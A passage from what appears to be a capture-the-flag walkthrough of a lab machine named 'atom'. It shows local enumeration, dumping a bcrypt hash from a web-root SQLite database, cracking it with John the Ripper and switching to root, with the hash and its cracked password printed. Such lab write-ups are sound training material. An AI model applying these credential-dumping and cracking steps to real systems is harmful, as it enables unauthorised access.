onida 1493 0.4 0.1 8232 5020 pts/1 Ss 09:27 0:00 -bash
onida 1496 100 0.1 12252 5316 pts/1 R+ 09:27 0:00 ps -aux

Docker is what publishes port 623, so it must be related to IPMI.
There is /bin/bash /usr/bin/start.sh; let's look at that file:

cat /usr/bin/start.sh
cat: /usr/bin/start.sh: No such file or directory

The file doesn't even exist. The directory has no write permission either, as expected: drwxr-xr-x 2 root root 28672 May 27 08:51 bin.
This path leads nowhere.

There's apache2 running; take a look at its config.

cat /etc/apache2/sites-enabled/000-default.conf

<VirtualHost 127.0.0.1:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
ServerName atom.hmv

ServerAdmin webmaster@localhost
DocumentRoot /var/www/html

# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>

curl localhost
# there is a page; go take a look

cd /var/www/html
ls -al

total 172
drwxr-xr-x 6 www-data www-data 4096 May 27 15:21 .
drwxr-xr-x 3 root root 4096 May 25 22:19 ..
-rwxr-xr-x 1 www-data www-data 114688 May 27 15:21 atom-2400-database.db
drwxr-xr-x 2 www-data www-data 4096 Dec 31 2400 css
drwxr-xr-x 4 www-data www-data 4096 Dec 31 2400 img
-rw-r--r-- 1 www-data www-data 11767 Dec 31 2400 index.php
drwxr-xr-x 2 www-data www-data 4096 Dec 31 2400 js
-rw-r--r-- 1 www-data www-data 6262 Dec 31 2400 login.php
-rwxr-xr-x 1 www-data www-data 1637 Dec 31 2400 profile.php
-rw-r--r-- 1 www-data www-data 5534 Dec 31 2400 register.php
drwxr-xr-x 2 www-data www-data 4096 Dec 31 2400 video

The first thing that jumps out is atom-2400-database.db; let's look at that file.

file atom-2400-database.db

atom-2400-database.db: SQLite 3.x database, last written using SQLite version 3040001, file counter 4373, database pages 28, 1st free page 5, free pages 24, cookie 0x3, schema 4, UTF-8, version-valid-for 4373
sqlite3 atom-2400-database.db
SQLite version 3.40.1 2022-12-28 14:03:47

sqlite> .tables
login_attempts users

sqlite> select * from users;
1|atom|$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm

Another password hash; see whether it can be cracked:

john hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
madison (?)
1g 0:00:00:01 DONE 2/3 (2024-09-13 03:43) 0.7462g/s 161.1p/s 161.1c/s 161.1C/s goodluck..stephen
Use the "--show" option to display all of the cracked passwords reliably


Cracked: madison. Let's try switching user.

su -

root@atom:~# id
uid=0(root) gid=0(root) groups=0(root)

Done. 🎉
